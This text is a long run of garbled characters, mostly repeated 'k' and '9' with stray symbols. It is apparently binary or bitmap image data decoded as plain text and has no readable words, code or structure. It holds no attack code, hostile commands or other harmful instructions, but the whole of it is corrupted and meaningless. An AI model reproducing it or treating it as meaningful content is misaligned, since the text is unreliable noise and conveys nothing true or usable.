Dkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk5
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk7kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*<kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk#kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk 	=;kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkC9999999999999!kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk2	999999999999999999991kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk;999999999999999999999Bkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999Jkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk!?99999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk'9999999999999999999999999##kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkR999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	 9999999999999999999999999997kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk&B9999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkJ99999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk'+999999999999999999999999999999J:kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkKJ9999999999999999999999999999999Wkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk$999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkT%999999999999999999999999999999999	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk5B9999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk ?99999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999.kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999991kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkK9999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk;99999999999999999999999999999999999999999Nkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk"99999999999999999999999999999999999999999B2kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999999999Bkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999999999&kkkkkkkkkkkkkkkkkkkkkkkkkkkkk`999999999999999999999999999999999999999999999Bkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1[999999999999999999999999999999999999999999999993kkkkkkkkkkkkkkkkkkkkkkkkkkkk199999999999999999999999999999999999999999999999Bkkkkkkkkkkkkkkkkkkkkkkkkkkkk<9999999999999999999999999999999999999999999999999JUkkkkkkkkkkkkkkkkkkkkkkkkkkkkZ9999999999999999999999999999999999999999999999999Bkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999999999999999Okkkkkkkkkkkkkkkkkkkkkkkkkkkkd9999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkk&99999999999999999999999999999999999999999999999999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkk29999999999999999999999999999999999999999999999999999999Okkkkkkkkkkkkkkkkkkkkkkkkkkkk#9999999999999999999999999999999999999999999999999999999'kkkkkkkkkkkkkkkkkkkkkkkkkkkkD999999999999999999999999999999999999999999999999999999999#kkkkkkkkkkkkkkkkkkkkkkkkkkkkD8999999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkf999999999999999999999999999999999999999999999999999999999999Dkkkkkkkkkkkkkkkkkkkkkkkkkkkk+999999999999999999999999999B99999999999999999999999999999999Dkkkkkkkkkkkkkkkkkkkkkkkkkkkk
9999999999999999999999999999999999999999999999999999999999999Dkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999,99999999999999999999999999999999Kkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkD999999999999999999999999999B99999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkke9999999999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999999999999999999999999"kkkkkkkkkkkkkkkkkkkkkkkkkkkk-999999999999999999999999999999999999999999999999999999999999Nkkkkkkkkkkkkkkkkkkkkkkkkkkkk$6999999999999999999999999999E999999999999999999999999999999999Qkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999C999999999999999999999999999999999Akkkkkkkkkkkkkkkkkkkkkkkkkkkk$dW99999999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999999999999999999999999999!kkkkkkkkkkkkkkkkkkkkkkkkkkkk	999999999999999999999999999999999999999999999999999999999999dSkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkk'C99999999999999999999999999d9999999999999999999999999999999999^kkkkkkkkkkkkkkkkkkkkkkkkkkkkd999999999999999999999999999999999999999999999999999999999999\Dkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk&999999999999999999999999999999999999999999999999999999999999Xkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*99999999999999999999999999C99999999999999999999999999999999999Jkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk?99999999999999999999999999B[9999999999999999999999999999999999,#kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk"999999999999999999999999999.9999999999999999999999999999999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*B99999999999999999999999999999999999999999999999999999999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999999999999999999999999999999999999999,Rkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999W99999999999999999999999999999999,"Okkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999C(W9999999999999999999999999999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	99999999999999999999999999999999999999999999999999999999,Skkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk19999999999999999999999999\C999999999999999999999999999999,"
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999999999999999999999X$kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999W999999999999999999999999999999999999Jkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999999999999999999999999/2kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999C99999999999999999999999999999999999
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk=C9999999999999999999999(99999999999999999999999999999999999VkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkN99999999999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999(9999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk,9999999999999999999=999999999999999999999999999999999NkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkW9999999999999999]C99999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk199999999999999999999999999999999999999999999999(kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkK09999999999996W9999999999999999999999999999999999999#kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk"99999C;9999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk?(9999999999999999999999999999999999999
kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk+99999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk%9999999999999999999999999999999999bh5kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkUK99999999999999999999999999999999999999999H#kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkE9999999999999999999999999999999999999999Hkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk!9999999999999999999999999999999999999999HUkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999Hkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999999999999999999999999999H"kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999999999999999999999999999999999Hkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	9999999999999999999999999999999999999H%kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999999999Hkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk%9999999999999999999999)PPPPPPP GGGGGGGgkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk&9999999999999999999999IF9999999Mkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999IF9999999Mkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999IF9999999M/kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk79999999999999999999999IF9999999Mkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk39999999999999999999999IF9999999Mkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk$9999999999999999999999IF9999999Mkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999IF9999999M+kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk	'(C9999999999999999gIIIIIII9999999MIIIIIII%kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*999999999999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk#S@999999999999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk1
@999999999999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk!@999999999999999999999999999999999999999 /kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk#@999999999999999999999999999999999999999 &kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkKNO@999999999999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk#N@999999999999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk15>@@@@@@@M9999999999999999999999999999999 	kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk49999999999999999999999999999999 kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999999999999999999999)FFakkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk+ 999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk+7999999999999999999999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkS7J99999999YGGGGGGGY9999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk#2
R" $99999999FF9999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk15	4&99999999FF9999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk199999999FF9999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkV99999999FF9999999999999999999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk%99999999FF99999999999999999999999999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999FF99999999999999999999999999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkD99999999FF99999999999999999999999999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkI        )99999999999999999999999999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkH9999999999999999999999999999999999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkH9999999999999999999999999999999999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk H9999999999999999999999999999999999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk"H9999999999999999999999999999999999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkH9999999999999999999999999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkH99999999999999999999kkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk>>>>>>9999999999999kkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999kkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk J/k9999999999999kkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999999999kkkkkkkk99999999EkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkQkkkk9999999999999kkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*kkkkkk9999999999999kkkkkkkk99999999Ekkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk4K2kkkkkkkkikkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk5kkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk5kkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk*kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
Tkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999kkkkkkk9999999kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk7$Jkkkkkkkkkkkkkkkkkkkkkkkkkkkkk[kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkRkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk4K"kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk2*$ 7kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk+D !kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk9999999kkkkkkkk99999999Ekkkkkkk99999999,kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkS	QN$-kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999_ckkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk99999999Lkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk999999999999999kkkkkkkkDkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk